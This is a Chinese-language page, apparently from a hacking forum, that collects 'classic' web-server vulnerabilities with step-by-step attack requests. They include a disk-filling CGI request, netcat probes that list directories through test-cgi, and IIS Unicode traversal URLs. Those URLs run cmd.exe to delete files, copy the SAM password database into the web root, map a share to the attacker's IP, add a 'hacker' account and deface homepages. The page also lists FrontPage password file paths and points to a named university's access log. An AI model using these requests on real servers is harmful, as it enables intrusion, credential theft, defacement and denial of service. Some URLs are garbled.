一些收集到的经典漏洞详解第2/2页

___________________________________________________________________________  
☆visadmin.exe☆  

这个漏洞可以在服务器中一直产生临时文件知道服务器的硬盘慢了为止。任何人都可以远程的来完成。  
使用使用在cgi-bin中默认的 visadmin.exe (Visitor Administrator)  
攻击方法：  
提交以下请求： http://www.targets.com/cgi-bin/visadmin.exe?user=guest  
___________________________________________________________________________  
☆no-such-file.pl☆  

这个漏洞会暴露其服务器上的路径，当你访问这个页面时会显示类似以下信息：  
CGI Error  
The specified CGI application misbehaved by not returning a complete set of  
HTTP headers. The headers it did return are:  
Can't open perl script "C:\InetPub\scripts\no-such-file.pl": No such file or  
Directory  
从此我们可以知道这个页面的物理路径为C:\InetPub\scripts\no-such-file.pl  
攻击方法：  
访问http://www.targets.com/cgi-bin/scripts/no-such-file.pl  
___________________________________________________________________________  
☆?PageServices☆  

这个是可以显示页面清单的！运气好的话还可以得到用户名和密码！（都是明文的）  
方法是url/?PageServices 还可以这样试试  
/?wp-cs-dump /?wp-ver-info /?wp-html-rend /?wp-usr-prop /?wp-ver-diff /?wp-verify-link /?wp-start-ver 
/?wp-stop-ver /?wp-uncheckout  

___________________________________________________________________________  
☆test-cgi☆  

test-cgi同样是个常常出现的漏洞，在浏览器中输入：  

http://thegnome.com/cgi-bin/test-cgi?\whatever  

将会返回：  

CGI/1.0 test script report:  

argc is 0. argv is .  

SERVER_SOFTWARE = NCSA/1.4B  
SERVER_NAME = thegnome.com  
GATEWAY_INTERFACE = CGI/1.1  
SERVER_PROTOCOL = HTTP/1.0  
SERVER_PORT = 80  
REQUEST_METHOD = GET  
HTTP_ACCEPT = text/plain, application/x-html, application/html,  
text/html, text/x-html  
PATH_INFO =  
PATH_TRANSLATED =  
SCRIPT_NAME = /cgi-bin/test-cgi  
QUERY_STRING = whatever  
REMOTE_HOST = fifth.column.gov  
REMOTE_ADDR = 200.200.200.200  
REMOTE_USER =  
AUTH_TYPE =  
CONTENT_TYPE =  
CONTENT_LENGTH =  

再来一次，这样输入：  

http://thegnome.com/  


看到PASSWD了？  

用netcat 80 端口 进行攻击：  

machine% echo "GET /cgi-bin/test-cgi?/*" | nc removed.name.com 80  

返回：  

CGI/1.0 test script report:  

argc is 1. argv is /\*.  

SERVER_SOFTWARE = NCSA/1.4.1  
SERVER_NAME = removed.name.com  
GATEWAY_INTERFACE = CGI/1.1  
SERVER_PROTOCOL = HTTP/0.9  
SERVER_PORT = 80  
REQUEST_METHOD = GET  
HTTP_ACCEPT =  
PATH_INFO =  
PATH_TRANSLATED =  
SCRIPT_NAME = /bin/cgi-bin/test-cgi  
QUERY_STRING = /a /bin /boot /bsd /cdrom /dev /etc /home /lib /mnt  
/root /sbin /stand /sys /tmp /usr /usr2 /var  
REMOTE_HOST = remote.machine.com  
REMOTE_ADDR = 255.255.255.255  
REMOTE_USER =  
AUTH_TYPE =  
CONTENT_TYPE =  
CONTENT_LENGTH =  

显示出了根目录！这样试试：  

machine% echo "GET /cgi-bin/test-cgi?*" | nc removed.name.com 80  

返回：  

CGI/1.0 test script report:  

argc is 1. argv is \*.  

SERVER_SOFTWARE = NCSA/1.4.1  
SERVER_NAME = removed.name.com  
GATEWAY_INTERFACE = CGI/1.1  
SERVER_PROTOCOL = HTTP/0.9  
SERVER_PORT = 80  
REQUEST_METHOD = GET  
HTTP_ACCEPT =  
PATH_INFO =  
PATH_TRANSLATED =  
SCRIPT_NAME = /bin/cgi-bin/test-cgi  
QUERY_STRING = calendar cgi-archie cgi-calendar cgi-date cgi-finger  
cgi-fortune cgi-lib.pl imagemap imagemap.cgi imagemap.conf index.html  
mail-query mail-query-2 majordomo majordomo.cf marker.cgi  
menu message.cgi munger.cgi munger.note ncsa-default.tar post-query  
query smartlist.cf src subscribe.cf test-cgi uptime  
REMOTE_HOST = remote.machine.com  
REMOTE_ADDR = 255.255.255.255  
REMOTE_USER =  
AUTH_TYPE =  
CONTENT_TYPE =  
CONTENT_LENGTH =  

显示了/CGI-BIN/目录下的东西  

___________________________________________________________________________  
☆unicode☆  

列目录：  
http://ip/msadc/..Á../..Á../..Á../winnt/system32/cmd.exe?/c+dir+c:\  
http://www.victim.com/scripts/..Á../winnt/system32/cmd.exe?/c+dir+c:\  

建立文件夹的命令  
http://x.x.x.x/scripts/..Á../winnt/system32/cmd.exe?/c+md+c:\snowspider  

删除空的文件夹命令：  
http://x.x.x.x/scripts/..Á../winnt/system32/cmd.exe?/c+rd+c:\snowspider  

删除文件的命令:  
http://x.x.x.x/scripts/..Á../winnt/system32/cmd.exe?/c+del+c:\autoexec.bak  

Copy文件  
http://xxx.xxx.xxx.xxx/scripts/..Á../winnt/system32/cmd.exe?/c+copy c:\winnt\repair\sam
._ c:\inetpub\wwwroot\  

NET USE的使用  
http://xxx.xxx.xxx.xxx/scripts/..Á../winnt/system32/net.exe?/c+use+i:+\\myip\temp  

改CMD方法  
http://xxx.xxx.xxx.xxx/scripts/..Á../winnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exe
+c:\inetpub\scripts\ccc.exe  
然后  
http://xxx.xxx.xxx.xxx/scripts/ccc.exe?/c+echo+Hacked+by+chinese+>+f:\wwwroot\xxx\default.asp  

显示目标主机当前的环境变量  
http://xxx.xxx.xxx.xxx/scripts/..Á../winnt/system32/cmd.exe?/c+set  

FIND命令使用  
比如我要查看WEB目录d:\inetpub\wwwroot下的所有asp、asa文件的内容：  
http://xxx.xxx.xxx.xxx/scripts/..Á..\winnt/system32/find.exe?/n+/v+""+d:\inetpub\wwwroot\*.as*  

显示某一路径下相同文件类型的文件内容  
http://xxx.xxx.xxx.xxx/scripts/..Á..\winnt/system32/find.exe?/n+/v+""+c:\inetpub\wwwroot\*.ht*  

添加用户命令  
新建一个用户名为hacker密码为password的用户：  
http://xxx.xxx.xxx.xxx/script/cmd.exe?/c c:\winnt\system32\net.exe user hacker password /add  

修改主页  
http://xxx.xxx.xxx.xxx/scripts/..Á../winnt/system32/cmd".exe?/c+echo+Hacked+by+hacker+
>+f:\wwwroot\xxx\default.asp  
>+f:\wwwro'>http://xxx.xxx.xxx.xxx/scripts/..Á../winnt/system32/cmd".exe?/c+echo+12/1/2k+>>+f:\wwwro
ot\xxx\default.asp  
这样，主页就被更改成了：  
Hacked by hacker  
12/1/2k  
关于更多的unicode漏洞可以在本论坛查找。  

___________________________________________________________________________  
☆_vti_inf.html☆  
描述： web根目录下存在_vti_inf.html文件,该文件是Frontpage extention server的特征,包含了一系列
Frontpage Extention Server的重要信息;而且Frontpage Extention server是一个有很多漏洞的web服务,
用它入侵者可能直接修改首页文件，如果你读http://www.victim.com/_vti_inf.html你将得到FP extensions
的版本和它在服务器上的路径. 还有一些密码文件如:  
http://www.victim.com/_vti_pvt/service.pwd  
http://www.victim.com/_vti_pvt/users.pwd  
http://www.victim.com/_vti_pvt/authors.pwd  
http://www.victim.com/_vti_pvt/administrators.pwd  

具体如何利用呢，我输入 www.hostname.com/_vti_inf.html ，然后查看  
源文件，发现的东东如何利用？  
解答：您可以先看看：http://www.shufe.edu.cn/  
再看看：http://www.shufe.edu.cn/xcb/Server/logs/access_log  

最新评论